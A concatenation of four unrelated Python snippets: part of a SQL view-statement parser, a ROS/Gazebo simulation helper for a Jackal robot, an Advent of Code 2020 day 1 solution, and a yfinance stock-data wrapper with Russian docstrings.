columnNames.append(ParserUtils.get_object_name(parser.parse_identifier()))
parser.expect_optional(",")
parser.expect("AS")
query = parser.get_rest()
view = PgView(ParserUtils.get_object_name(viewName))
view.columnNames = columnNames
view.query = query
schemaName = ParserUtils.get_schema_name(viewName, database)
schema = database.getSchema(schemaName)
if schema is None:
raise Exception("CannotFindSchema" % (schemaName, statement))
schema.addView(view)
|
#!/usr/bin/env python
import rospy
from std_srvs.srv import Empty
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import SetModelState, GetModelState
from geometry_msgs.msg import Quaternion
from sensor_msgs.msg import LaserScan
from pyquaternion import Quaternion as qt
def create_model_state(x, y, z, angle):
model_state = ModelState()
model_state.model_name = 'jackal'
model_state.pose.position.x = x
model_state.pose.position.y = y
model_state.pose.position.z = z
e = qt(axis = [0, 0, 1], angle = angle).elements
model_state.pose.orientation = Quaternion(e[1], e[2], e[3], e[0])
model_state.reference_frame = "world";
return model_state
class GazeboSimulation():
def __init__(self, init_position = [0, 0, 0]):
self._pause = rospy.ServiceProxy('/gazebo/pause_physics', Empty)
self._unpause = rospy.ServiceProxy('/gazebo/unpause_physics', Empty)
self._reset = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
self._model_state_getter = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
self._init_model_state = create_model_state(init_position[0],init_position[1],0,init_position[2])
def pause(self):
rospy.wait_for_service('/gazebo/pause_physics')
try:
self._pause()
except rospy.ServiceException:
print ("/gazebo/pause_physics service call failed")
def unpause(self):
rospy.wait_for_service('/gazebo/unpause_physics')
try:
self._unpause()
except rospy.ServiceException:
print ("/gazebo/unpause_physics service call failed")
def reset(self):
"""
/gazebo/reset_world or /gazebo/reset_simulation will
destroy the world setting, here we used set model state
to put the model back to the origin
"""
rospy.wait_for_service("/gazebo/set_model_state")
try:
self._reset(self._init_model_state)
except (rospy.ServiceException):
print ("/gazebo/set_model_state service call failed")
def get_laser_scan(self):
data = None
while data is None:
try:
data = rospy.wait_for_message('front/scan', LaserScan, timeout=5)
except:
pass
return data
def get_model_state(self):
rospy.wait_for_service("/gazebo/get_model_state")
try:
return self._model_state_getter('jackal', 'world')
except (rospy.ServiceException):
print ("/gazebo/get_model_state service call failed")
def reset_init_model_state(self, init_position = [0, 0, 0]):
self._init_model_state = create_model_state(init_position[0],init_position[1],0,init_position[2])
|
import os
# Part 1: Find 2 numbers that add to 2020 and multiply them
dirname = os.path.dirname(os.path.abspath(''))
filename = os.path.join(dirname,'inputs','d01_input.txt')
with open(filename, "r") as f:
lines = f.read().splitlines()
for num in lines:
current_number = int(num)
#print(current_number)
for num2 in lines:
#print(num2)
if (current_number + int(num2)) == 2020:
answer = current_number * int(num2)
print(f'Answer is {current_number}+{num2}={answer}')
break
else:
continue
# Part 2: Find 3 numbers that add to 2020 and multiply them
for x in lines:
num1 = int(x)
#print(current_number)
for y in lines:
num2 = int(y)
for z in lines:
num3 = int(z)
if (num1 + num2+num3) == 2020:
answer = num1*num2*num3
print(f'Answer is {num1}+{num2}+{num3}={answer}')
break
else:
continue |
import yfinance as yf
class Asset:
def __init__(self, tiker):
"""
Инициализируем переменную tiker
:param tiker: Тикер запрашиваемой котировки
"""
self.tiker = yf.Ticker(tiker)
self.tiker_name = tiker
def get_hist_last_1_day(self):
"""
Получает исторические данные за 1 день по интервалу
2 минуты для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="1d", interval="2m")
return result["Close"]
def get_hist_last_5_days(self):
"""
Получает исторические данные за 5 деней по интервалу
15 минут для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="5d", interval="15m")
return result["Close"]
def get_hist_last_1_month(self):
"""
Получает исторические данные за 1 месяц по интервалу
1 день для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="1mo", interval="1d")
return result["Close"]
def get_hist_last_6_months(self):
"""
Получает исторические данные за 6 месяцев по интервалу
1 день для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="6mo", interval="1d")
return result["Close"]
def get_hist_last_1_year(self):
"""
Получает исторические данные за 1 год по интервалу
5 дней для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="1y", interval="5d")
return result["Close"]
def get_hist_ytd(self):
"""
Получает исторические данные с начала текущего года
по интервалу 5 дней для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="ytd", interval="5d")
return result["Close"]
def get_hist_last_5_years(self):
"""
Получает исторические данные за 5 лет по интервалу
1 месяц для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="5y", interval="1mo")
return result["Close"]
def get_hist_all_time(self):
"""
Получает исторические данные за все время по интервалу
1 месяц для заданного тикера
:return: Возвращает Pandas DataFrame колонка "Close"
"""
result = self.tiker.history(period="max", interval="1mo")
return result["Close"]
def get_trailingPE(self):
"""
:return: Возвращает значение P/E
"""
return self.tiker.info['trailingPE']
def get_enterpriseToEbitda(self):
"""
:return: Возвращает значение EV/EBITDA
"""
return self.tiker.info['enterpriseToEbitda']
def get_priceToBook(self):
"""
:return: Возвращает значение P/B
"""
return self.tiker.info['priceToBook']
def get_forwardEps(self):
"""
:return: Возвращает значение EPS
"""
return self.tiker.info['forwardEps']
def get_priceToSalesTrailing12Months(self):
"""
:return: Возвращает значение P/S
"""
return self.tiker.info['priceToSalesTrailing12Months']
def __repr__(self):
return f"Объект 'yfinance' с заданным тикером {self.tiker_name}"
if __name__ == "__main__":
test = Asset("TSLA")
# print(test.get_hist_last_1_day())
print(test)
print(type(test))
print(test.get_trailingPE())
print(test.get_enterpriseToEbitda())
print(test.get_priceToBook())
print(test.get_forwardEps())
print(test.get_priceToSalesTrailing12Months())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.